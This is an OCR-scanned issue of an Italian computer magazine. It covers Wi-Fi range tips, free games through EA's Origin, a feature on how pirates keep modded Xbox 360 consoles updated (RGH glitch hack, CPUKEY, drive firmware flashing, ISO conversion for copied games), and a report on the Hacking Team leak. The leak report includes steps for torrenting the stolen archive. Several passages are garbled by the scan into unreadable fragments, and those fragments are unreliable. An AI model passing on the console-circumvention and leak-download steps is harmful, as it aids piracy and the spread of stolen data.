Fi di circa 1,5 volte. C’è però una piccola con¬ 
troindicazione da tenere presente i questo ca¬ 
so: il segnale, infatti, viene direzionato esclu¬ 
sivamente dal lato aperto della lattina, mentre 
viene attutito nelle altre direzioni. Poco ma¬ 
le se il router è posizionato su un lato della 
casa e il segnale deve irrorare tutte le altre 
stanze. Se abbiamo un router con più an¬ 
tenne, inoltre, possiamo provare il trucco 
applicando la lattina solo ad una di esse 
e lasciando le altre libere di trasmettere 
il segnale Wi-Fi in tutte le direzioni. In 
alternativa, possiamo acqui¬ 
stare su Internet un'antenna 
potenziata come la TP-LINK 


IN BREVE 


ATTENTI 
AL FILE 
SHARING 


Ci sono program¬ 
mi che se mal 
configurati po¬ 
trebbero intasare 
la connessione. 

È questo il caso, so¬ 
prattutto, dei down¬ 
load manager e dei 
Client P2P come 
eMule e JDown- 
loader. Non a ca¬ 
so, tutti questi pro¬ 
grammi permet¬ 
tono di configura¬ 
re l’occupazione di 
banda lasciando 
all’utente la possi¬ 
bilità di scegliere se 
scaricare a mille o 
bilanciare la veloci¬ 
tà di download con 
quella di navigazio¬ 
ne su Internet. 


TL-ANT2408CL da sostituire a quelle fornite in 
dotazione con il router. 

(?) SFRUTTIAMO TUTTI 
V I CANALI 

I router utilizzando le normali onde radio 
per trasmettere il segnale Wi-Fi su fre¬ 
quenze di 2,4 GHz. Il problema è che vicino 
casa nostra potrebbero esserci numerosi 
dispositivi che trasmettono su queste fre¬ 
quenze generando notevoli interferenze. 
La soluzione è cambiare il canale di tra¬ 
smissione. 

La maggior parte dei router in commercio uti¬ 
lizzano la frequenza di trasmissione a 2,4 GHZ 
e trasmettono solo 3 canali non sovrapposti, 
tra i 14 disponibili per le comunicazioni wire¬ 
less. Ciò significa che se la zona in cui abitiamo 
è affollata di reti Wi-Fi avremo un traffico no¬ 
tevole su questi 3 canali. Addirittura, anche un 
forno a microonde o un telefono cordless po¬ 
sizionati vicino al router potrebbero creare no¬ 
tevoli interferenze. Ecco perché nella scelta del 
router Wi-Fi da acquistare è opportuno optare 
per un modello con doppio canale di comuni¬ 
cazione: il classico a 2,4 GHz e il più potente a 
5 GHz. Questi router hanno un software di ge¬ 
stione che permette di scegliere in automatico 



la frequenza migliore da utilizzare per evitare in¬ 
terferenze e garantire sempre il miglior sfrutta¬ 
mento della banda Wi-Fi. 



RIPETIAMO 
IL SEGNALE 


Se abitiamo in una casa molto grande o 
con lunghi corridoi e muri spessi, possiamo 
risolvere il problema dell’attenuazione 
del segnale Wi-Fi semplicemente ampli¬ 
ficandolo! 

In pratica, si tratta di acquistare un ripetitore 
wireless da collegare ad una presa di corren¬ 
te elettrica posizionata a metà strada tra il rou¬ 
ter (da cui riceve il segnale) e i dispositivi Wi-Fi 
da connettere alla rete domestica (ai quali dif¬ 
fonde il segnale). Il FRITZIWLAN Repeater 310, 
ad esempio, estende in modo semplice e sicuro 
la portata della rete wireless a dispositivi qua¬ 
li smartphone e tablet anche se si trovano nei 
punti più lontani. Piccolo come un biglietto da 
visita, si può usare praticamente con ogni pre¬ 
sa della casa (www.winmagazine.it/link/31 36). 


Quanto è potente la tua WLAN? 

Prima di scegliere la terapia occorre formulare la diagnosi, che dovrà accertare il punto debole della rete wireless. 
Per farlo bastano un notebook e il tool HeatMapper (scaricabile da Win Extra). Ecco come procedere. 



^ La pianta deH’appartamento 

Disponendo della piantina dell’appartamen¬ 
to sarà molto più facile stabilire una diagno¬ 
si. Se abbiamo solo una stampa, effettuiamone una 
scansione e salviamo l'immagine in formato JPEG. 
In caso contrario, basterà anche uno schizzo e potre¬ 
mo orientarci con la griglia fornita dal programma. 



Siamo subito operativi 

2 Installiamo il software su un notebook e atti¬ 
viamo la connessione alla rete wireless. Sce¬ 
gliamo se lavorare su una piantina (/ have a map 
image) o con la griglia inclusa nel programma (/ 
don’thave a map image). Fissiamo con un clic la 
nostra posizione, contrassegnata da un punto verde. 


rnm oocra 


lottali 

brnphlcn I tinta II 

Instali wlth tpettk synlheili 


^ Analizziamo la rete 

Spostiamoci per l’appartamento e fissiamo 
altre posizioni. Cucchiamo col tasto destro 
sull'immagine a video: HeatMapper visualizzerà la 
rete WLAN. Le superfici di colore verde indicano buo¬ 
na ricezione, quelle di colore arancione/rosso eviden¬ 
zieranno invece una cattiva connessione. 
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Giochi sul PC 
costo zero 

C'è un modo per divertirsi con i 
videogiochi più hot del momento 
senza sborsare un centesimo 


Cosa ci ' 
occorre j ACILE 


PIATTAFORMA DI 

DISTRIBUZIONE 

DIGITALE 

ORIGIN 

✓DVD 

SBMBEO 

Sito Internet: 

www.origin.com 


ias 

GIOCHI COMPLETI, 

MA A TEMPO 

Origin ci dà anche la 
possibilità di provare 
dei giochi per un 
periodo di tempo limi¬ 
tato durante il quale 
i progressi vengono 
salvati. Se, successi¬ 
vamente, decideremo 
di acquistare il gioco, 
potremo riprendere la 
partita dal punto in cui 
l'abbiamo interrotta. 

Per visualizzare questa 
categoria di giochi e 
installarli clicchiamo su 
GIOCHI 6RATUITI/Game 
Time, quindi clicchiamo 
sul pulsante Scarica Ora 
accanto al gioco che 
vogliamo provare. 


P assare un po' di tempo a giocare col 
computer è sempre un piacere, ma 
lo è ancora di più se lo possiamo fare 
senza dover mettere mano al portafoglio. 
Ma dove possiamo trovare un videogioco a 
costo zero? La soluzione, del tutto legale, è 
portata di clic! Può fare infatti sicuramente 
al caso nostro Origin, un software di Elec¬ 
tronic Arts che, una volta effettuata una 
semplice registrazione on-line, ci consente 
di scaricare e installare i giochi completi 
offerti gratuitamente. Inoltre, avviando il 
gioco dalla piattaforma Origin possiamo 
salvare i dati del gioco direttamente nel 
cloud e continuare le nostre partite anche 
da altri PC su cui è presente il programma. 
Ricordiamoci di tenere d'occhio il pro¬ 
gramma: nuovi divertenti giochi a costo 
zero vengono rilasciati periodicamente! 



Creiamo un account EA 

Apriamo il nostro browser Internet, raggiun¬ 
giamo il sito www.origin.com e facciamo 
clic in alto sulla voce Registrati. Nella fine¬ 
stra che si apre digitiamo nell'apposito box il nostro 
indirizzo di posta elettronica e proseguiamo pre¬ 
mendo il pulsante Avanti. 
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Completiamo la registrazione 

Visualizzeremo adesso un modulo: scegliamo un ID pub¬ 
blico (il nostro nickname) e una password per l’account, 
compiliamo quindi tutti i campi richiesti e facciamo clic 
Avanti. Ci verranno chiesti nome e cognome, che però sono 
opzionali: premiamo il tasto Salta. 


0 Origin 

Powered by EA 


Email o ID 


Password 

Eseguiamo l’accesso 

a Facciamo doppio clic sull’icona di Origin che troviamo in 
basso sulla System tray e quando compare l’interfaccia 
inseriamo l’ID (o l'indirizzo di posta elettronica con il quale 
ci siamo registrati) e la password. Premiamo quindi il pulsante 
Accedi. 



Scarichiamo un titolo gratuito 

j Nella schermata che ci chiede nome e cognome premia¬ 
mo Salta. Quando si apre l’interfaccia del software clic- 

_J chiamo sul menu GIOCHI GRATUITIe poi su Offre laditta. 

Scorriamo lapaginafinché non compare il box Gioco attualmente 
gratuito. Clicchiamo su Scarica Ora. 



Ora tocca a Origin 

Creato l'account, premiamo Continua. Nell’home page 
I clicchiamo Scarica Origin, poi su Download Origin for 
PC, quindi salviamo il file di setup su disco. Completato 
il download, facciamo doppio clic sul file OriginThinSetup.exe, 
premiamo Installa e seguiamo la procedura guidata. 






} Ongm 




DOVE SONO I 
NOSTRI GIOCHI? 

Una volta installati i 
giochi possiamo farli 
partire direttamente 
dall'interfaccia di Origin 
diccando sulla voce 
in alto IMIEI GIOCHI. 
Troveremo così elencati 
i titoli che abbiamo già 
installato. Passando il 
mouse su uno dei giochi 
comparirà una piccola 
finestra: facciamo clic su 
Croco per avviare il gio- 
co oppure sul pulsante 
i per visualizzare infor¬ 
mazioni su di esso o di¬ 
sinstallarlo (in tal caso 
andiamo nella scheda 
Dettagli e clicchiamo su 
Disinstalla). 


Impostazioni Privacy 

arnia ai origin Coda chi pub visuaiisart u tuo prono compioto • corno nnt trovar* 

Chi può viauolir/ore il mio profilo: 

Nco 3 uno * i 


CoiiMriiU oyli ululili di vìtualiiuiv 
Obiettivi e Punii Ongm 

Pei infili ayli utenti di evitatiti! pvi 

V. E-nal ramatila ani lindi / 


Configuriamo la privacy 

) Nella schermata successiva possiamo impostare la nostra 
privacy. Se non vogliamo essere contattati da altri utenti 
i Origin scegliamo Nessuno dal menu a tendina Chi può 
visualizzare il mio profilo e togliamo il segno di spunta da tutte 
le voci. Proseguiamo con Continua. 



Pronti a giocare! 

a Scegliamo la lingua disponibile e clicchiamo Accetta. 
Lasciamo invariate le opzioni di default e premiamo Con¬ 
tinua. Spuntiamo Ho letto e accetto gli accordi di licenza 
di cui sopra e clicchiamo Continua. Terminato il download, verrà 
installato il gioco. Al termine premiamo Gioca. 


SALVATAGGI 

ON-LINE 


Origin dispone della 
funzionalità del salva¬ 
taggio doud dei dati del 
gioco che consente di 
accedere e continuare a 
giocare da qualsiasi PC 
sul quale è installato il 
programma. Per assicu¬ 
rarci che tale funzione 
sia attiva, avviamo 
Origin, effettuiamo 
l'accesso, andiamo 
nel menu Origin/ 
Impostazioni applica¬ 
zione e nella scheda 
Generale assicuriamoci 
che sia spuntata Attiva 
memorizzazione su 
doud per tutti i giochi 
supportati. In questo 
modo i dati di salvatag¬ 
gio del gioco saranno 
sempre sincronizzati 
col doud. Per sapere 
invece quanto spazio 
doud sta utilizzando un 
gioco, dall'interfaccia 
principale clicchiamo su 
IMIEI GIOCHI, passiamo 
il mouse sul titolo di 
nostro interesse, clic¬ 
chiamo sul pulsante i, 
andiamo nella scheda 
Cloud Storage (se la 
scheda non c'è, vuol 
dire che il gioco non 
supporta il salvataggio 
cloud) e controlliamo 
l'indicatore Utilizzo di 
cloud Storage. 
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Per saperne di più | Console di gioco: upgrade sblocca-tutto 


■lèhnsole: upgrade 
■M sblocca-tutto 


Così i pirati aggiornano le Xbox modificate 
per continuare a giocare gratis con i nuovi 
titoli e divertirsi con la Kinect 





L a nascita e l’evoluzione delle console di 
gioco sono fenomeni tipici degli ultimi 
40 anni della nostra storia e queste mac¬ 
chine delle meraviglie rappresentano oggi il 
40% dell'intero mercato videoludico. Questo 
porta le grandi case produttrici di console, 
come Microsoft e Son , a puntare molto su 
questo settore, proponendo agli utenti 
hardware sempre più potenti in 
grado di riprodurre esperienze 
di gioco realistiche e al passo 
con le produzioni delle sof¬ 
tware house di videogiochi. 
Una delle più grandi spine 
nel fianco per le aziende 
produttrici di console è 
però lo sviluppo, da par¬ 
te di esperti hacker, di 
modifiche (hardware 


o software) che permettono di eseguire copie 
di backup di giochi scaricati dal Web diretta- 
mente sulla console senza la necessità, natu¬ 
ralmente, di acquistare il titolo. 

Tutto inizia con la Playstation 

Dalla prima Playstation in poi, lanciata sul mer¬ 
cato nel 1994, gli hacker sono sempre riusciti 
a modificare le console anche quelle di nuova 
generazione. Naturalmente, le case produttrici 
non sono rimaste a guardare e sono sempre 
corse ai ripari aggiornando software e dashbo- 
ard dei propri dispositivi in modo da prevenire 
eventuali hack del sistema e rendendo questi 
aggiornamenti necessari al corretto avvio dei 
giochi e prevenendo, di fatto, la possibilità di 
avviare i backup con sistemi modificati. I pirati 
delle console, quindi, una volta effettuata la 
loro modifica, non possono restare tranquilli 


ATTENZIONE! 

Al momento, in Italia non c'è un preciso orientamento legisla ¬ 
tivo in merito alla modifica delle console di gioco. Le nostre 
corti di giustizia considerano l'applicazione dei cosiddetti 
modchip e, più in generale, le modifiche per le console da 
gioco come illecite per violazione dell'art. 171 -ter della 
nostra legge sul diritto d'autore. Molte sono invece ■ 
le posizioni dottrinali opposte, le quali valutano i | 
modchip come importanti strumenti per garantire 
interoperabilità e incentivare gli sviluppatori in- 
dipendenti. É opportuno comunque pre- $ m 

cisareche Win Magazine non si schiera 
ovviamente a favore della pirateria: le / 
procedure mostrate nell'articolo non 
vengono volutamente pubblicate j 

in maniera dettagliata per non 
consentire di mettere in pratica I 

la modifica della console. 0 A 


COSÌ I PIRATI AGGIORNANO LE 



mento alternativo al?a c^assS Sa °hboaS Cf e attende la f ase di carica- 
si collegherà all'Xbox diaitanHn na i h ° ar term ' ne ' tramite computer 
ricavare la CPUKEY, il codice identi JtS ogtxbox de " a ^ 
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LE PRINCIPALI MODIFICHE CHE SI POSSONO APPORTARE SULL'XBOX 360 


TIPO DI MODIFICA 

DESCRIZIONE 

VANTAGGI 

SVANTAGGI 

FLASH DEL 
LETTORE 

Consiste nella riscrittura, tramite 
software, del firmware originale 
del lettore; lo stesso firmware viene 
sostituito con uno preparato "ad hoc" 
che permetta la riproduzione di ISO 
masterizzate su DVD+R DL. 

• Immediatezza di utilizzo 

• Permette il gioco online (non è garantita la NON esclusione 
dal UVE ufficiale) 

• Compatibilità limitata con alcuni 
giochi 

• Deve essere aggiornato ad ogni 
avvento di nuove protezioni 
inserite sui giochi 

• Richiede un materizzatore 
compatibile con tali firmware 

RESET GLITCH 
HACK 

Viene sfruttato un impulso (il glitch), 
creato ed implementato da un Hardware 
installato (il Glitcher) dentro la console, 
al fine di poter"inserire", durante la 
procedura di avvio della macchina, 
un codice non firmato che, una volta 
avviato, permetta la riproduzione di 
software non firmato dal produttore. 

• Permette la riproduzione da Hard Disk, interno od esterno, 
di codice non firmato, Backup dei propri giochi originali, 
Emulatori di retroconsole, homebrew ed applicazione di 
terze parti 

• Permette un pieno controllo e la regolazione della 
temperatura di utilizzo della console 

• Non sono strettamente necessari aggiornamenti successivi 
all'installazione 

• Non permette il gioco Online 

• Ha tempi di avvio variabili 
(da 30 secondi a 2 minuti 
dall'accensione della console) 

EMULATORI 

DEL LETTORE 
ODE 

Viene sfruttato un hardware che emula 
il lettore della console e permette la 
riproduzione di ISO da Hard Disk USB 
esterni. 

• È disattivabile 

• È di immediato utilizzo 

• Permette di effettuare aggiornamenti ufficiali 
(disattivandolo) 

• Permette il gioco online (Non è però garantita la NON 
esclusione dal UVE ufficiale) 

• Non permette la riproduzione di 
software non firmato 

• Non permette l'esecuzione di 
emulatori od Homebrew 

• Il costo dell'emulatore 

MULTI 

NANDRGH 

Alla modifica RGH citata prima viene 
aggiunta una o più modalità di avvio. In 
tal maniera è possibile avviare la console 
anche in modalità originale e godere dei 
benefici che ne conseguono. 

• Permette la riproduzione da Hard Disk, interno od esterno, 
di codice non firmato, Backup dei propri giochi originali, 
Emulatori di retroconsole, homebrew ed applicazione di 
terze parti 

• Permette un pieno controllo e la regolazione della 
temperatura di utilizzo della console 

• Permette, in modalità originale, di effettuare 
aggiornamenti ufficiali sulla console 

• Permette il gioco Online in modalità originale (non è pero' 
garantita la NON esclusione dal UVE ufficiale) 

• Ha tempi di avvio variabili 
(da 30 secondi a 2 minuti 
dall'accensione della console) 


ma anzi, al contrario, devono mantenere la 
loro macchina da gioco sempre aggiornata. 
Dovranno verificare periodicamente l'uscita 
in Rete di eventuali upgrade della dashboard 


che consentano loro di giocare anche ai vide¬ 
ogiochi appena usciti sul mercato o di usare la 
kinect senza problemi. Una procedura piutto¬ 
sto delicata ma che, nel caso della Xbox 360, 


è anche abbastanza semplice da eseguire: al 
pirata, infatti, bastano una chiavetta USB, sulla 
quale copiare i tool necessari per completare 
la modifica, e la cosiddetta chiave CPUKEY. 


XBOX MODIFICATE 


Ef\ 


simpteSGO 

Dvw.Jo*<l • >* m v** 560 * 


NANO fU***«» 


(Severi) 

1LTOOL MAGICO F’ERXA scarica sul proprio 

A questo punto lo smanettone ^ e “ scomp atta in una cart ®!|! 

in FAT32) il file Default.xex. 


C ^‘^NAND 0 sTJ."* rt ® d (bv « 

(4a °0 Mft) 

°° frorn •«•'"Ptlno to rasi 0 x 3000000 b 

<UCOMa ' u "V 0 x 3000000 by*. 

Compia attmr 3 ^ 0 * m * ^* w>mo b 

-"V *»itton 
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XOSÌI PIRATI AVVIANO I GIOCHI SULLE CONSOLE MODIFICATE 

Prima di poter usare la Xbox modificata, il pirata deve opportunamente "trattare" i giochi per consentire alla console di leggerli. 
Tale procedura cambia a seconda che il gioco viene caricato dall'hard disk interno alla console o da una chiavetta USB. 
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« u bd— <rcr » i «ftm uwvj Ovvero<y Input 
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Avvio giochi da disco 

Se la modifica alla Xbox è stata effettuata ag¬ 
giornando il firmware del lettore ottico, il 
pirata effettuerà la masterizzazione dei 
giochi su dischi DVD da 8 GB utilizzan¬ 
do un qualsiasi software di maste- 
^ rizzazione, previa patch con un 
particolare software facilmente 
^ reperibile in Rete. È richiesta una 
connessione ad Internet duran¬ 
te l'esecuzione del programma. 

Dopo aver avviato il tool per 

patchare il gioco, il pirata procederà con il settaggio delle varie opzioni. Al ter¬ 
mine, procederà al caricamento del gioco in formato ISO selezionando il file 
immagine disponibile su disco.Tutta questa procedura serve per rendere 
le copie di backup il più possibile simili agli originali, onde ce ne fosse 
bisogno, e quindi di assicurarne il funzionamento su lettori con la 
modifica firmware. Nei canali underground del Web, generalmente, 
i giochi si trovano pronti per la masterizzazione e formati da un 
file .ISO e da un file .DVD con lo stesso nome che precede 
l'estensione. In IMGBURN sarà sufficiente selezionare il file 
.DVD; il software automaticamente masterizzerà il .ISO 
su disco, associandogli alcuni importanti parametri per 
una scrittura corretta (come il LAYERBREAK). 
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ALLA RICERCA DEL NUOVO DUMP 

Terminata la fase di upgrade, lo smanettone copia su' a 
chiavetta il file updflash.bin creato al Passe, 4 ScollegaMa 
oendrive dal computer e la collega nuovamente alla Xbox. 
Dal File Manager del Freestyle avvierà questa volta il file 

Default.xex. 
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Avvio giochi da USB 


ISO Detaik,.. 

Image Location: 


Output Location: 

Title Detaib 

Nanrte The Sabotem 

Title ID: 4541088F 

Medw ID: 7547ED02 


Browsi 



Disc: 1 7 1 


Plat 0 Ex: 0 


1 


Nei tipi di modifica in cui è permessa la riprodu¬ 
zione di backup da supporti rimovibili USB è ne¬ 
cessario "preparare"questi ultimi affinché vengano 
riconosciuti dalla console stessa o dall'hardware 
che li ospita. Nel caso di emulatore del Lettore 
ODE, il pirata formatta in NTFS il supporto USB da 
utilizzare. Dentro la root principale crea una car¬ 
tella chiamata GAMES dove andrà a copiare le ISO 
nude e crude. Mediante alcuni semplici passaggi 
sull'interfaccia ufficiale (dashboard) della console 
caricherà il menu di selezione della ISO stessa. Per 
le modifiche Reset Glitch Hack e Multi Nand RGH 
dovrà invece formattare il supporto USB'\r\FAT32 e 
creare all'interno una cartella destinata ad ospitare 
i giochi in formato GOD o folder. Grazie ad un sof¬ 
tware di conversione, freeware e reperibile in rete, 
il pirata trasforma le ISO nude e crude in formati 
riconosciuti dalla console e le copia sul supporto 
USB. Al pirata basterà poi selezionarne il percorso 
di ricerca dall'interfaccia dedicata (Freeboot) per 
ritrovarseli tutti nel catalogo di Freeboot stesso, 
pronti per essere giocati. IS02G0D rappresenta il 
software di conversione per eccellenza preferito 

dagli smanettoni delle console, sia per la praticità che per la velocità di utilizzo. Caricata l'immagine ISO del gioco 
il pirata inizia con la conversione e al termine provvede alla copia. Alla fine del processo troverà direttamente il 
gioco convertito sotto forma di cartella alfanumerica, ovviamente nel percorso precedentemente scelto in OUTPUT. 
Allo stesso modo è possibile selezionare come destinazione l'hard disk della console, previa connessione in rete di 
quest'ultima tramite cavo Ethernet. Al pirata basterà poi impostare l'indirizzo IP di quest'ultima ed il gioco è fatto. 


Padding Remova . 

Mode _£ulUl£JUìahuiili_ 0 Save Rebu* ISO Imag^ 

xaiy Location fot Rebu* ISO 

i C:\s4 


Azjicn I I p. 



DASHBOARD 

Indica la versione del 
sistema operativo 
presente sulla conso¬ 
le. Ad ogni differente 
versione della da¬ 
shboard corrisponde 
una diversa versione 
del kernel. 

CPUKEY 

È una chiave esade- 
cimale univoca asso¬ 
ciata alla CPU della 
console. 

B00TL0ADER 

Una delle parti del 
kernel il cui compito 
è quello di avviare 
tutti i componenti 
software necessari 
al corretto funziona¬ 
mento della console. 

HOMEBREW 

Software realizzati 
esclusivamente per 
funzionare su conso¬ 
le modificate e non 
approvati diretta- 
mente da Microsoft. 



LA MODIFICA DELL'XBOX È SERVlTAi 

attende Scompleta m^n t e"n U ^ 3 C ° nsole M nuovo dur 
Al termine, estrae la chiavetta e procedura dl aggiornarne 
Per la gioia del pirata sarà nm t normalmer >te l'Xbox 

di nuova generazione! P n a per sopportare anche i i 


SE LA KINECT È FUORI USO 


Abbiamo visto che i pirati delle 
console una volta effettuata la loro 
modifica, non possono restare tran¬ 
quilli ma sono costretti a mantenere 
la loro Xbox sempre aggiornata se 
vogliono continuare a giocare gratis 
con i nuovi titoli scaricati dalla Rete 
o se vogliono divertirsi con i giochi 
che usano la Kinect. Nel caso della 
Kinect, potrebbe presentarsi a vi¬ 
deo una schermata di errore che 
invita il giocatore ad effettuare un 
upgrade del sistema. Va detto che la 
Kinect per il corretto funzionamen¬ 
to richiede anche l'aggiornamento 
Avatar installato. Questo succede 
principalmente con leXbox360, con 
modifica RGFH, che a causa dell'ag¬ 



giornamento della Dashboard Live 
si ritrovano con una versione della 
Dash differente rispetto a quella pre¬ 
sente nella parte RGFH. Per risolvere 
questi problemi (aggiornamento Ki¬ 



nect più Avatar), il pirata scaricherà 
da Internet la stessa versione della 
Dashboard installata sulla propria 
console. Effettuato il download 
estrae il contenuto dell'archivio nella 
cartella $$ystemupdate e copierà il 
tutto in una chiavetta USB. Avvia la 
console (scollegata dalla Rete) con 
la Dashboard Originale, inserisce la 
pennetta e attende che la periferica 
di gioco porti a termine gli aggior¬ 
namenti richiesti. 
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Hacking Team: 
vediamoci chiaro! 

I retroscena dello scandalo che ha portato alla luce il Datagate 
italiano sulle intercettazioni illegali 


I l suo nome? Hacking Team. Il motivo di queste 
pagine? Dedicarle una storia. Perché? Per ciò 
che ha fatto. E cosa fa e ha fatto, di preciso, 
Hacking Team? In effetti la sua attività è avvolta 
nel più fitto mistero, ma è qui, che comincia 
la nostra storia. Di questa azienda con sede 
a Milano si sapeva che sviluppa software di 
sorveglianza, ma non era chiaro fino a dove 
arrivasse questa sorveglianza e dove, invece, 
iniziassero concetti quali intrusione, spionaggio 
e controllo remoto. 

L’inizio di tutto 

Tutto questo, per lo meno, fino al 6 luglio di 
quest'anno. Sono le prime ore del mattino, quan¬ 


do dall'account Twitter ufficiale dell’azienda 
viene pubblicato un messaggio che, di fatto, 
dà inizio a un attacco senza precedenti. In bre¬ 
ve: oltre 400 gigabyte di dati presi dai server 
dell'Hacking Team vengono riversati in Rete, 
sfruttando inizialmente il sito di sharing Mega e 
il circuito Torrent. Da quel momento, l'azienda 
italiana tenta una disperata strategia difensiva, 
ma bastano poche ore per accorgersi che il dan¬ 
no è irreparabile. Tra le centinaia di gigabyte di 
dati trafugati, infatti, figurano elenchi di clienti 
e fatture, e-mail di manager e sviluppatori e, 
soprattutto, codici sorgenti (cioè le istruzioni 
che compongono un programma) che danno 
vita ai noti software dell'Hacking Team. 


Un’azienda scomoda 

Prima ancora d’interessarsi al contenuto di 
questi dati, tuttavia, il pensiero va ai responsabili 
di questo attacco. Chi ha potuto fare questo? 
Molti puntano il dito contro la scarsa sicurezza 
dei sistemisti milanesi, rei di aver utilizzato 
password come "7” o "PasswOrd". Tuttavia, al di 
là di queste colpe, ancora tutte da verificare, è 
meglio chiedersi chi avesse interesse a rilasciare 
in Rete questo materiale e, di fatto, condannare 
all’oblio una compagnia che fatturava milioni e 
milioni di euro ogni anno. Se da una parte le in¬ 
dagini sono in una fase ancora troppo immatura 
per azzardare qualche conclusione, dall'altra le 
ipotesi non mancano. La prima è che si tratti di 


Trovare il materiale top secret 

Una volta riversati in rete gli oltre 400 Gigabyte di dati di Hacking Team, è partita subito la caccia da parte di individui 
senza scrupoli. Ecco come fanno ad attingere a questo materiale, posto che possederlo è altamente illegale! 
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Questi furbom senza wj Jjj gliene un adware 
lorrenl. Scartalo pTor . pedono a www.deluge- 
cattivello, puntano su Download Patto questo, scelgono 

avviarne il download. 
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Completing thè Deluge 1 3.11 Setup 
Wizard 

Deàjge 1.3.11 Km bccn nstalcd on yois computer. 

flrtr fné\ tn rln» «anni 


Nel caso di Windows ’b, gli basta fare un doppio 
clic sul file scaricato per avviarne la procedura di 
installazione. Nelle schermate del wizard cliccano 
in successione Sì, Ne*t, I Aqree, Ntesf e Instali. Pi 
fatto, il programma torrent e pronto per il subdolo 
progetto... 







| Hacking Team | Parliamo di... 
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QUESTI GOVERNI CI SPIANO! 

La mappa mondiale con la dislocazione dei server di Hacking Team: il sospetto è che 
i governi di questi 21 paesi abbiano usato il software di spionaggio per scopi non leciti. 



21 SUSPECTED GOVERNMENT USERS 


AMhKUAS RIKtW_MIDDIF fASI_AIKKA_ASIA 


Mnxloo Hurgnry Tiirkoy Oman Egypt Nlgorln Azartooljan Thtiinnd 

Colombia itaiy Saudi Arabia Lthiopia Sudan Kazakistan South Korea 

P/wimn Potarvi UAE Morocco Malaysia Uzbekistan 



un hacker, o un gruppo di hacker, che si batte 
per la libertà (digitale ma non solo) e, dunque, 
accusa Hacking Team di produrre software 
pronti a soffocarla. Per dirne una, la compagnia 
di via della Moscova, già nel 2013, compariva 
nell’elenco dei "nemici di Internet" stilato da 
Reporters sans frontières. Alcuni indizi, infatti, 
mostravano che il sistema RCS (Remote Control 
System) sviluppato da Hacking Team era in 
uso anche presso governi senza alcuna consi¬ 
derazione dei diritti umani. L’azienda guidata 
da David Vincenzetti ha sempre negato questo 
tipo di coinvolgimento, eppure, come vedremo, 
i dati trafugati lo sbugiardano. 

Concorrenza sleale 

La seconda ipotesi è che a sferrare la sortita 
informatica ai server milanesi sia stato un 
concorrente. Si parla di ex dipendenti con tut¬ 
to l’interesse a far fuori l’azienda per proporsi 
come valida alternativa ai suoi tanti clienti. 
L’emorragia di talenti dalla sede milanese di 
Hacking Team, in effetti, rende plausibile anche 
questa teoria. Infine, l’ipotesi più suggestiva: un 
governo colpito dai software made in Italy che, 
in qualche modo, voleva frenarne la diffusione. 
Oppure, addirittura, un ex cliente governativo 
con tutto l’interesse a mettere KO la società do¬ 
po averne sfruttato i servigi. Difficile stabilire, 
ora, quale sia la teoria più realistica, ma dalle 
informazioni trapelate in merito all’attacco 
emerge qualche verità assoluta. Innanzitutto, 
400 gigabyte di dati non sono una bazzecola. 
È servito molto tempo, almeno qualche setti¬ 
mana, per scaricarli. Ciò posto, possibile che 
un'azienda composta da esperti di sicurezza 
di comprovata fama non si sia accorta di un’in¬ 
trusione del genere? Un furto così massiccio 


lascia tracce non solo a lavoro ultimato, ma 
anche in corso d’opera: grossi rallentamen¬ 
ti della linea, accessi dalTesterno, una certa 
instabilità del sistema, per dire le prime che 
vengono in mente. Davvero nessun si è accorto 
di nulla? E soprattutto: davvero, degli esperti, 
con anni di esperienza alle spalle, e fior di enti 
governativi e società che dipendono dai loro 
programmi, prescindono dalla regola numero 1 
della sicurezza informatica, ossia utilizzare una 
password sicura? Come detto, è impossibile, al 
momento, sapere come siano andate realmente 
le cose, ma è altrettanto difficile ipotizzare un 


attacco in un solo senso, dall’esterno e senza 
alcun intervento “accomodante” daH'interno. 
Fatto da qualcuno che conosceva molto bene 
l’architettura informatica dell’azienda. 

The Black List 

Se in merito alle cause non ci sono certezze, 
queste abbondano, invece, sulle attività dell’Ha- 
cking Team e sui suoi clienti, proprio grazie a 
quanto emerso dalla miniera di dati sottratti. 
Partiamo dai clienti, con un elenco che include 
non solo paesi "leciti", ma anche altri sotto em¬ 
bargo o con ben poca considerazione dei diritti 
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A questo punto i furboni, effettuano un doppio clic 
sul file .torrent appena scaricato per aprire il file 
in Peluge e ritrovarsi con l'enorme archivio Hacfcing 
Team spezzettato in tanti, grossi, file. Cl chi scarica 
l'archivio nella sua interezza cliccando sul pulsante 
Aggiungi. 
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■ In questa mappa è possibile seguire i percorsi dei dati elaborati dal sistema RCS (Remote Control 
System) di Hacking Team per trasmettere le informazioni facendo perdere le loro tracce. 


umani: Australia, Azerbaijan, Bahrain, Cile, 
Colombia, Cipro, Repubblica Ceca, Ecuador, 
Egitto, Etiopia, Germania, Honduras, Unghe¬ 
ria, Italia, Kazakhstan, Lussemburgo, Malesia, 
Messico, Mongolia, Marocco, Nigeria, Oman, 
Panama, Polonia, Russia, Arabia Saudita, Sin¬ 
gapore, Corea del Sud, Spagna, Sudan, Svizzera, 
Tailandia, Emirati Arabi, Stati Uniti, Uzbekistan 
e Vietnam. A questi, si aggiungono decine di enti 
militari e aziende private, in particolare alcuni 
colossi finanziari e delle telecomunicazioni. 
Una lista da far tremare fior di scrivanie, proprio 
per la particolarità dei software sviluppati da 
Hacking Team. E qui arriviamo al pezzo forte 
dei famosi 400 GB di dati trafugati: il codice che 
rivela il funzionamento del software milane¬ 
se. Di base, il sistema Remote Control System 
Galileo, come l’azienda stessa lo definisce, è 
una “hacking suite for governmental intercep- 
tion", quindi una sorta di coltellino svizzero 
in grado di effettuare intercettazioni a livello 
governativo. Più prosaicamente, parliamo di 
un vero e proprio trojan, quindi un programma 
che, una volta installato in un dispositivo, è in 
grado di intercettarne qualsiasi dato e inviarlo 
al “mandante”. Dire trojan, in realtà, significa 
ben poco: ci sono trojan realizzabili in un paio 
d'ore e molto basilari, altri che richiedono anni 
di ricerca e sviluppo. Da quanto emerso analiz¬ 
zando il codice trafugato dagli uffici di Hacking 
Team, Galileo era tutto fuorché un trojan banale. 
Tutt’altro. Già nel 2014, i ricercatori di aziende 


di sicurezza informatica quali Kaspersky Lab 
e Citizen Lab analizzarono il programma di 
Hacking team, evidenziandone buona parte 
delle caratteristiche più avanzate. Per esempio, 
la grande versatilità, con moduli in grado d’in¬ 
stallarsi in pressoché qualsiasi dispositivo fisso e 
mobile. E poi funzioni per raccogliere e inviare, 
o deviare, al mandante e-mail, SMS, telefonate, 
posizioni GPS, per arrivare all’attivazione di 
fotocamera e microfono. E sullo sfondo, una 
rete di oltre 350 server sparsi in tutto il mondo, 
